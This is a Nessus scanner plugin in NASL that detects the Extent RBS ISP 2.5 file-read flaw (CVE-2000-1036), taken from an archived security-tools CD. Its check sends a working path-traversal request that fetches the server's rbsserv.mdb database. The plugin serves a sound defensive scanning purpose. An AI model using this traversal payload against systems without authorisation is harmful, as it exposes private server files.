home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / rbs.nasl < prev    next >
Text File  |  2005-03-31  |  2KB  |  74 lines

  1. #
  2. # This script was written by Zorgon <zorgon@linuxstart.com>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10521);
  10.  script_bugtraq_id(1704);
  11.  script_version ("$Revision: 1.13 $");
  12.  script_cve_id("CVE-2000-1036");
  13.  
  14.  name["english"] = "Extent RBS ISP";
  15.  name["francais"] = "Extent RBS ISP";
  16.  script_name(english:name["english"], francais:name["francais"]);
  17.  
  18.  desc["english"] = "The 'Extent RBS ISP 2.5' software is installed. This 
  19. software has a well known security flaw that lets anyone read arbitrary
  20. files with the privileges of the http daemon (root or nobody).
  21.  
  22. Solution : remove it or patch it (http://www.extent.com/solutions/down_prod.shtml)
  23.  
  24. Risk factor : High";
  25.  
  26.  
  27.  desc["francais"] = "Le logiciel 'Extent RBS ISP 2.5' est installΘ. Celui-ci possΦde un problΦme de sΘcuritΘ bien connu qui permet α n'importe qui de 
  28. faire lire des fichiers  arbitraires au daemon http, avec les privilΦges
  29. de celui-ci (root ou nobody). 
  30.  
  31. Solution : retirez-le ou mettez-le α jour (http://www.extent.com/solutions/down_prod.shtml)
  32.  
  33. Facteur de risque : SΘrieux";
  34.  
  35.  
  36.  script_description(english:desc["english"], francais:desc["francais"]);
  37.  
  38.  summary["english"] = "Checks for the presence of Extent RBS ISP 2.5";
  39.  summary["francais"] = "VΘrifie la prΘsence de Extent RBS ISP 2.5";
  40.  
  41.  script_summary(english:summary["english"], francais:summary["francais"]);
  42.  
  43.  script_category(ACT_GATHER_INFO);
  44.  
  45.  script_copyright(english:"This script is Copyright (C) 2000 Zorgon <zorgon@linuxstart.com>",
  46.         francais:"Ce script est Copyright (C) 2000 Zorgon <zorgon@linuxstart.com>");
  47.  family["english"] = "CGI abuses";
  48.  family["francais"] = "Abus de CGI";
  49.  script_family(english:family["english"], francais:family["francais"]);
  50.  script_dependencie("find_service.nes", "no404.nasl");
  51.  script_require_ports("Services/www",80);
  52.  exit(0);
  53. }
  54.  
  55. #
  56. # The script code starts here
  57. #
  58.  
  59. include("http_func.inc");
  60. include("http_keepalive.inc");
  61. port = get_http_port(default:80);
  62.  
  63. res = is_cgi_installed_ka(port:port, item:"/newuser");
  64. if(res){
  65.  req = string("/newuser?Image=../../database/rbsserv.mdb");
  66.  req = http_get(item:req, port:port);
  67.  soc = http_open_socket(port);
  68.  send(socket:soc, data:req);
  69.  buf = http_recv(socket:soc);
  70.  http_close_socket(soc);
  71.  if("SystemErrorsPerHour" >< buf)    
  72.      security_hole(port);
  73. }
  74.